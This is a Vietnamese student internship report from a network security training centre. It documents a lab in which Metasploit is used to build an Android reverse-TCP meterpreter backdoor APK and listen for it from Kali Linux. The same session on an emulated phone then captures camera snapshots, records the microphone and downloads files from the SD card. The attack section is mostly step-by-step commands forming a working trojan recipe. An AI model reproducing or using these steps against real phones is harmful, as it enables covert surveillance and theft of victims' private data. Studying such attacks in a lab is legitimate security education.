TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG
QUỐC TẾ
ĐỀ TÀI :
NGHIÊN CỨU CÁC TROJAN, MALWARE
CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH
SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN
THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
BÁO CÁO TUẦN 3
GVHD: VÕ ĐỖ THẮNG
SVTH: TRẦN THANH THÔNG
MSSV: 1120168
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 1
PHẦN 1: THỰC HIỆN TRÊN MẠNG LAN
1.1. Nghiên cứu và cài đặt Kali Linux trên VMware
1.2. Tạo mã độc trên Kali Linux xâm nhập Android
1.2.1. Tạo mã độc trên Kali Linux
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi
máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử
dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:
Bấm vào VM Settings... ở thanh lựa chọn của Vmware
Bấm vào Network Adapter và chọn Bridged: connection directly to the
physical network
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 2
Bấm vào Edit => Virtual Network Editor...
Trên phần Bridge (connect VMs directly to the external network) chọn
adapter của máy thật
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 3
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đầu tiên mở Terminal và gõ dòng lệnh
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.126.130
lport=8080 R > /root/Desktop/hack.apk
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 4
192.168.126.130 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig
để xem IP của máy Kali
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử
dụng
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 5
Lệnh trên sẽ tạo ra 1 file hack.apk trên desktop của Kali, đây chính là một
Metasploit reverse tcp backdoor.
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsole load xong, ta tạo một handler để xử lí dữ liệu truyền về
bằng cách gõ lệnh sau:
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 6
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.126.130 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
Thử với một máy Samsung Galaxy S3 giả lập, tải về hack.apk, cài đặt và
mở lên được giao diện như dưới, nhấp vào nút reverse_tcp
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 7
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như
sau:
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 8
Để xem thông tin về máy, nhập lệnh SysInfo
1.2.2. Thực hiện khai thác dữ liệu trong SDcard
a. Sử dụng camera
Để xem danh sách camera, nhập webcam_list
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 9
Để chụp hình bằng camera, nhập webcam_snap x với x là ID của camera
xem ở danh sách camera ở phần trước. Ví dụ như sau:
File hình đã chụp từ camera của máy android là GBgAyecQ.jpg được lưu ở
/root của máy
b. Ghi âm
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 10
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về
máy
c. Lấy file từ SDcard
Để vào SDcard, nhập lệnh cd /sdcard và lệnh ls để xem danh sách file, thư
mục
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 11
Ví dụ ở đây, ta tải file hack-1.apk trong thư mục download của SDcard
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 12
Dùng lệnh cd /sdcard/Download để vào thư mục
BÁO CÁO THỰC TẬP: Nghiên cứu các Trojan, Malware cho phép đánh cắp
dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng Android và gửi
ra ngoài
Trang 13
Như trên hình, ta thấy 2 file là hack-1.apk và hack.apk, để tải hack-1.apk
về máy, ta nhập lệnh
Download hack-1.apk
Và file này sẽ được tải về thư mục root của máy Kali
Top Related